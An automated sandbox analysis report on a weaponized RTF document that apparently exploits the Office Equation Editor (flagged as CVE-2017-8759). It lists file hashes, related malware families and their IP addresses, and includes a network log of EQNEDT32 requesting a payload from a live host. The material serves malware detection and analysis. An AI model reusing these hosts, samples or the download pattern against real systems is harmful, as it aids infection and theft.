      ZAHER.xlsGet hashmaliciousUnknownBrowse
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AS-COLOCROSSINGUS2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
        • 198.46.174.139
        DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
        • 107.174.69.116
        LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
        • 107.175.229.139
        LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
        • 108.174.60.238
        042240724.xlsGet hashmaliciousRemcosBrowse
        • 198.46.176.133
        LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
        • 107.175.229.139
        LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
        • 107.175.229.139
        createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
        • 198.46.176.133
        greatbunfeelsoftandhoney.gif.vbsGet hashmaliciousUnknownBrowse
        • 198.46.176.133
        LisectAVT_2403002B_38.exeGet hashmaliciousSalityBrowse
        • 107.172.18.180
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):8704
        Entropy (8bit):4.862293047489914
        Encrypted:false
        SSDEEP:96:NqmMP/Le+83gh3MkbNACcko773PJHtLYsgMPPLG+8Sh3MkbNACcko773PJHtLY:NKPAgh3MkbN4V7XPbh3MkbN4V7
        MD5:EC81F2A62B600C5E8989935B3B6DEDB3
        SHA1:C43B3DC124A6EBE07544841664E16F7B88A12282
        SHA-256:A2B3199CE47B7E46945194284B4FF06730F43424838CE9E04AB1B3C656429EF0
        SHA-512:A137442130290B7BCA894282A48F0A11FC598E66976C574EE4F0043681ADC82DD7063848288459CADADFEEE32E3BE00AD312AC5380041631B9A0A858C26AF39A
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):12800
        Entropy (8bit):3.5473476883082995
        Encrypted:false
        SSDEEP:384:fKYfIkxfAubGU9+kG+Hi2m8dAT5wyM0vTQ4Z:CYPfAaZ+V+H5AtwyvVZ
        MD5:5CA99FE06638C551EBD553DAD13A3DBD
        SHA1:615033539ACC5988428C8221947413501CEA7A3C
        SHA-256:83F7CDE409CD03686639769FD1AB114164AC4DB31D5CB2B74B6BEE2F726749DB
        SHA-512:483D7FE9F2EB6A6DD72EECF6D401916C65E09B2E2AE52F6E60FB66F75DC835BC854E20BE9D57CEC93A207D069EB0C9480CAC750F1E4DA62AD65C6D7D020FEC7A
        Malicious:false
        Reputation:low
        Preview:................1.1.4.8.9.1.0.0.+...2._.9._...|.@.=.&.7.+.9.%.).>.^.`.>.!.7.#.$.?.5.3.;.[.=...6.4.#.!.+..._.@.>.8.*.8.8.).0.9.).?.&...`.&.$._.6.:.,.+.#.?.6.5.6.'...9.7.4.,.(.4.<.5.9._.9.^.+.+.<.|.@.~.].6.....+.@.,.%.(.,.?.*...?.9.1.(.&...^.=.2.7.#.../.:.~...?._.0.`._.~.%.8.?.'.7.!.4.?.%.|.>.9.8.[.[.$.%.+.?.@.^...2.#...0...#.-.(.+.*.-.>.5.3.~.?.-...`.>...:.(.>.4.1.*.2.!.....8.%.[.]...6.8.4.?.5.:...%...7.....[.7._...7.~.[.=...&.(./.'.@.?././.'.=.|.>.7.-./.7.%.?.`.&.6.3.'.%./.:.=.;.1.`.,./.%.%.:.+.(.5.8.>.,.,.?.&.?.?.&...0.#.'.=.@...1.?.[.%...9.].+...<.].$.+.6.,...<.?.0.[.?.#...?.8.=.?.'.?.:.^.?.3.[.9.-.9.9.3.5.-.<.%.4.~.%.%.3.=.9.?.,.3./.7.$.:.|.%.].$.8.@.+.@./.*.`.>.+.>.1.`.9.~.(.;.9.|.!.$.|.:.>.5.(./.....0...%.7.'.)...%.%...*.$.?.].@.4.1.@.#.$.?.#.,...7.'.2./.?.<.7.1.&.-.4.).`.#.?.-.#.&.>./...>.4...!.;.(.?.3.0.<.?.2.).~.<.%.3.?...2.,.#.;...`.@.~.^.2.#.&.4.`._./.8.*.-.5...&._.8.4.*._.$.'.~.[.'...+.~._.~.$.(.'.[.:.:.^.4.5.%.1...;.3.8.^.?.@.#.).4.%.@.9.4...,.+...?.].$.5.^.`.:.^.<...$.=.|.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Reputation:high, very likely benign file
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Fri Jul 26 05:20:59 2024, length=93079, window=hide
        Category:dropped
        Size (bytes):1014
        Entropy (8bit):4.546465392739778
        Encrypted:false
        SSDEEP:12:8k6FgXg/XAlCPCHaX4JTBTlB/5YXX+WEntWIahicvb+yel4efDtZ3YilMMEpxRlv:8D/XToJT1l4Xun3eSyGDv3qkk7N
        MD5:88500828A6EF0A5B4D07A22FC0E4CA39
        SHA1:DD2A5F2A459729BD7433436B2D10E857B68EAE05
        SHA-256:21BB343C627CBD00A2C1B56B1423E859605E8D9BC8757F5E380BF2BFC4D6D11D
        SHA-512:DE6E1C13F2F07A64D7BDBC38D89FC64C723A1CCB14B22F9C1CC0DA4280E19A9F608B613169468B10C72CCAD190DAE75BB8BE4B80F24D47BFB199241AFE114F93
        Malicious:false
        Reputation:low
        Preview:L..................F.... ....~D.r....~D.r....$B.#....k...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.2..user.8......QK.X.X.2*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..k...X.2 .BILSEM~1.RTF..J.......WE..WE.*.........................B.i.l.s.e.M.H.A.L.F...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\114127\Users.user\Desktop\BilseMHALF.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.i.l.s.e.M.H.A.L.F...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......114127..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [folders]
        Category:dropped
        Size (bytes):55
        Entropy (8bit):4.5038203952248335
        Encrypted:false
        SSDEEP:3:HsMTpkm44pkv:HtlVm
        MD5:3899B80AA77C8EDA15488D463DA8DE3B
        SHA1:82ADA0652D959481D98DDF83DA9B06AFB129CFAE
        SHA-256:504388E0FDBE64DE4D1D61206EFA3767C76150ADBF8AE90F64667773C840841C
        SHA-512:8C569D1123A7811C72A6C1FCD60DECE6F719E18E6023FA87A117FD93C2539962C21F753311EEC0DE7B5E6C028765915FB477D6682524F4AE8A6BD65A4445D240
        Malicious:false
        Reputation:low
        Preview:[misc]..BilseMHALF.LNK=0..[folders]..BilseMHALF.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyvJlxOl0XklMWxsFlcFyldllln:vdsCkWtMJa2XkX29H/l
        MD5:9515925BA816A641DCF27861B720B5F4
        SHA1:7B2D4812894F9A0B739F14FE349D6779558C28F0
        SHA-256:1A89665A9EDBE5AEA1369DBB8B45AD1E110716EE3F038CEA03EFF296C48EC97D
        SHA-512:E0A543D1CE3F270F2B34847869780C951C98200C81274D33CD2486DDBD03910759BC369ECAC696B344399F903F44BC6ACAC40F845BBA1C5EDD5BF4E9B562E008
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
        Category:dropped
        Size (bytes):50933
        Entropy (8bit):5.277124471977862
        Encrypted:false
        SSDEEP:384:323tHbrN79ozVzEFH3WJ3MqarQeKpqRcokR3VKRQE8r7hs6wgYqjON/Ei6rGsNAh:323b3WJ8QjlK0667ZaohAZqCp
        MD5:1923045E9968D20212DC82131BE38CDF
        SHA1:6449F169D139B239431463527065224227087DF7
        SHA-256:AFF5481D0AAD9D4B392550313599914BB791F1977A894C6E465C915FBD9887B9
        SHA-512:4A5D489F63037C3699CB138C40D5C03C19DFEF0C86E23B2D1EFA55391B0E087D635E55E82632CFD7A10F84D40E7A98374AF2E9214C4870B3B6AE47E57868B2B8
        Malicious:true
        Reputation:low
        Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyvJlxOl0XklMWxsFlcFyldllln:vdsCkWtMJa2XkX29H/l
        MD5:9515925BA816A641DCF27861B720B5F4
        SHA1:7B2D4812894F9A0B739F14FE349D6779558C28F0
        SHA-256:1A89665A9EDBE5AEA1369DBB8B45AD1E110716EE3F038CEA03EFF296C48EC97D
        SHA-512:E0A543D1CE3F270F2B34847869780C951C98200C81274D33CD2486DDBD03910759BC369ECAC696B344399F903F44BC6ACAC40F845BBA1C5EDD5BF4E9B562E008
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
        Category:dropped
        Size (bytes):50933
        Entropy (8bit):5.277124471977862
        Encrypted:false
        SSDEEP:384:323tHbrN79ozVzEFH3WJ3MqarQeKpqRcokR3VKRQE8r7hs6wgYqjON/Ei6rGsNAh:323b3WJ8QjlK0667ZaohAZqCp
        MD5:1923045E9968D20212DC82131BE38CDF
        SHA1:6449F169D139B239431463527065224227087DF7
        SHA-256:AFF5481D0AAD9D4B392550313599914BB791F1977A894C6E465C915FBD9887B9
        SHA-512:4A5D489F63037C3699CB138C40D5C03C19DFEF0C86E23B2D1EFA55391B0E087D635E55E82632CFD7A10F84D40E7A98374AF2E9214C4870B3B6AE47E57868B2B8
        Malicious:true
        Yara Hits:
        • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:true
        Preview:[ZoneTransfer]....ZoneId=0
        File type:Rich Text Format data, version 1
        Entropy (8bit):2.6799886136492246
        TrID:
        • Rich Text Format (5005/1) 55.56%
        • Rich Text Format (4004/1) 44.44%
        File name:BilseMHALF.rtf
        File size:93'079 bytes
        MD5:02f4c5ec7b7df33ebc8d9bcedc15f61e
        SHA1:5f4a15f00b5759e1a85f48b700c17c34da5a7e4a
        SHA256:5451bce754f64f99ef4d135d9d1cd709021200637cb892cc88dca5680c2f94a4
        SHA512:f6c41dd3260e97fe19cef3c97161116fe906b9a90a32523b5496b0c8be08253321ce5d2be02db19b5814ec9199ce850b6713a898e98a5ec67d8c6d247408f9a9
        SSDEEP:768:emW/gDQiaAtHAdAGAivoElojUQWcoaoSHQ3d:emW/gDBaAS6icIJcoazHy
        TLSH:2E93F089D38F06A5CF84A277025B0E8A05FCB73EB24101B574AC977437EEC2E49A55BC
        File Content Preview:{\rtf1.............{\*\adjust3Value114118214 \[}.{\811489100+.2_9_.|@=&7+9%)>^`>!7#$?53;[=.64#!+._@>8*88)09)?&.`&$_6:,+#?656'.974,(4<59_9^++<|@~]6..+@,%(,?*.?91(&.^=27#./:~.?_0`_~%8?'7!4?%|>98[[$%+?@^.2#.0.#-(+*->53~?-.`>.:(>41*2!..8%[].684?5:.%.7..[7_.7~
        Icon Hash:2764a3aaaeb7bdbf
        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
        0000017AAhno
        TimestampSource PortDest PortSource IPDest IP
        Jul 26, 2024 08:21:03.062503099 CEST4916380192.168.2.22172.245.123.11
        Jul 26, 2024 08:21:03.067812920 CEST8049163172.245.123.11192.168.2.22
        Jul 26, 2024 08:21:03.067935944 CEST4916380192.168.2.22172.245.123.11
        Jul 26, 2024 08:21:03.068057060 CEST4916380192.168.2.22172.245.123.11
        Jul 26, 2024 08:21:03.072870016 CEST8049163172.245.123.11192.168.2.22
        Jul 26, 2024 08:21:03.560662985 CEST8049163172.245.123.11192.168.2.22
        Jul 26, 2024 08:21:03.560749054 CEST4916380192.168.2.22172.245.123.11
        Jul 26, 2024 08:21:03.679792881 CEST4916380192.168.2.22172.245.123.11
        • 172.245.123.11
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.2249163172.245.123.11801060C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampBytes transferredDirectionData
        Jul 26, 2024 08:21:03.068057060 CEST344OUTGET /90290/somethingnewthingsareupmeforgirls.gIF HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 172.245.123.11
        Connection: Keep-Alive
        Jul 26, 2024 08:21:03.560662985 CEST541INHTTP/1.1 404 Not Found
        Date: Fri, 26 Jul 2024 06:21:03 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Content-Length: 300
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 172.245.123.11 Port 80</address></body></html>


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:02:20:59
        Start date:26/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fa50000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:02:21:00
        Start date:26/07/2024
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543'304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        No disassembly